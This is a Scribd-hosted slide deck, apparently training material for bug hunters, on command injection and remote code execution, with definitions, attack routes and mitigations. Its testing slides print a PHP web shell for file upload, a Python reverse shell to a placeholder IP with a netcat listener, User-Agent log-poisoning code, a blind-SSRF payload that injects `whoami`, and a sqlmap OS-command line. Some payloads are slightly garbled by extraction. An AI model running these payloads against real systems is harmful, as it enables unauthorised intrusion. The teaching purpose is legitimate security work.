Scribd
Upload
11 views20 pages

RCE & Command Injection

Uploaded by

afkiclrjksksmhfcet
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
11 views20 pages

RCE & Command Injection

Uploaded by

afkiclrjksksmhfcet
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 20

Command

Injection
&
RCE
01
Command
Injection
CONTENTS

• What is Command Injection?

• How it Works.

• Testing Methodology

• Impact and Mitigation

• Practical Demonstration
What is Command Injection?
• Command injection is a vulnerability that involves

executing arbitrary commands on a host operating

system (OS).

• Typically, the attacker injects the commands

by exploiting an application vulnerability, such as

insufficient input validation.


How it Works
How it Works
Testing Methodology
Command Injection Methods :

• Arbitrary command injection

• Arbitrary file upload

• Insecure Deserialization

• Server-side template injection (SSTI)

• XML external entity injection (XXE)


Impact
• The attacker extends the default functionality of a vulnerable

application, causing it to pass commands to the system shell, without

needing to inject malicious code.

• In many cases, command injection gives the attacker greater control

over the target system.


Mitigation
• Don’t Run System Commands with User-Supplied Input

• Use Strong Input Validation for Input Passed into Commands

• Use the Principle of Least Privileges

• Update and Patch Applications

• Regularly Test the Application


02
RCE
CONTENTS

• What is RCE?

• How it Works.

• Testing Methodology

• Practical Demonstration
What is RCE?

• Security Vulnerability that allows attackers

to run arbitrary code on a remote machine,

connecting to it over public/private networks.


How it Works
Testing Methodology
RCE Via File Upload:

• Open text editor & paste the command:

<?php echo "shell";system($_get['cmd']); ?>

• Save the file with .php extension


• Upload the file
Testing Methodology
RCE Via File Upload:

• Now open the file uploaded through url

• At the end of the url add “ ?cmd=id “

• Also try other commands “ ?cmd=pwd ”


Testing Methodology
RCE Via LFI:

• Look for the "/proc/self/environ" file,


If any part of the request is stored there,

• After the file Type


&cmd=python –c
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.
SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

• In User-agent header add: <?php system($_GET['cmd']); >>

• In Terminal Set listener ( nc –lv 4444)


• Send the request
Testing Methodology
RCE Via Blind SSRF:
• When we encounter with blind hit while hunting SSRF we try to escalate it to RCE:

http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net
Testing Methodology
RCE Via Blind SSRF:
• To escalate blind SSRF to RCE:

http://example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net ?`whoami`
Testing Methodology
SQL Injection to RCE:

• When we get SQL based error in website we


can try to insert commands from SQLMAP.
• Command :

Sqlmap –u {url} --random-agent --os-cmd whoami


Thank You

You might also like